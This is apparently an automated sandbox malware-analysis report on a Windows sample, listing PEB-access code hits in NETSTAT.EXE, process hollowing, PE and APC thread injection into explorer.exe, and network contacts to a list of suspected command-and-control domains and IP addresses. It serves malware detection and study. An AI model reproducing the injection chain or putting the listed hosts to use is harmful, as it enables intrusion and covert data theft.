          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BAFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B42AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BE8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B58EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BCFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B42ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BCFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B1E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B15210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B33A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B48E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BD1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B28A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B5927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BCB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BCB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BE8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B2766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BDEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BA4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BDAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BDAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B41DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BE05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B42990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B4FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B4A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B3C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B42581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B12D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BC8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BA41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B2D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BDFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B96DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B96DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B1AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BDE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B23D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BE8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B9A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B44D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B34120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B3C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B1C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B37D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B53D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B93540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B4F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B2849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B19080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BD14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BE8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BAB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.pvplearing.net
          Source: C:\Windows\explorer.exeDomain query: www.newmandu.com
          Source: C:\Windows\explorer.exeDomain query: www.support-applela.com
          Source: C:\Windows\explorer.exeNetwork Connect: 3.13.255.157 80
          Source: C:\Windows\explorer.exeNetwork Connect: 152.44.33.193 80
          Source: C:\Windows\explorer.exeNetwork Connect: 108.128.238.226 80
          Source: C:\Windows\explorer.exeDomain query: www.paintersdistrictcouncil.com
          Source: C:\Windows\explorer.exeDomain query: www.bancosecurity.website
          Source: C:\Windows\explorer.exeDomain query: www.bestwishesforyou.online
          Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.91 80
          Source: C:\Windows\explorer.exeDomain query: www.pone2.com
          Source: C:\Windows\explorer.exeDomain query: www.evonnemccray.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.nfoptic.com
          Source: C:\Windows\explorer.exeDomain query: www.unclejoeandkamala2020.com
          Source: C:\Windows\explorer.exeNetwork Connect: 91.121.60.23 80
          Source: C:\Windows\explorer.exeDomain query: www.nahomredda.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeMemory written: C:\Users\user\Desktop\8sxgohtHjM.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 1060000
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess created: C:\Users\user\Desktop\8sxgohtHjM.exe C:\Users\user\Desktop\8sxgohtHjM.exe
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeProcess created: C:\Users\user\Desktop\8sxgohtHjM.exe C:\Users\user\Desktop\8sxgohtHjM.exe
          Source: explorer.exe, 00000005.00000000.274140289.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000005.00000002.521779443.0000000001980000.00000002.00000001.sdmp, NETSTAT.EXE, 00000010.00000002.522995356.0000000005F90000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000002.521779443.0000000001980000.00000002.00000001.sdmp, NETSTAT.EXE, 00000010.00000002.522995356.0000000005F90000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000002.521779443.0000000001980000.00000002.00000001.sdmp, NETSTAT.EXE, 00000010.00000002.522995356.0000000005F90000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000002.521779443.0000000001980000.00000002.00000001.sdmp, NETSTAT.EXE, 00000010.00000002.522995356.0000000005F90000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Users\user\Desktop\8sxgohtHjM.exe VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
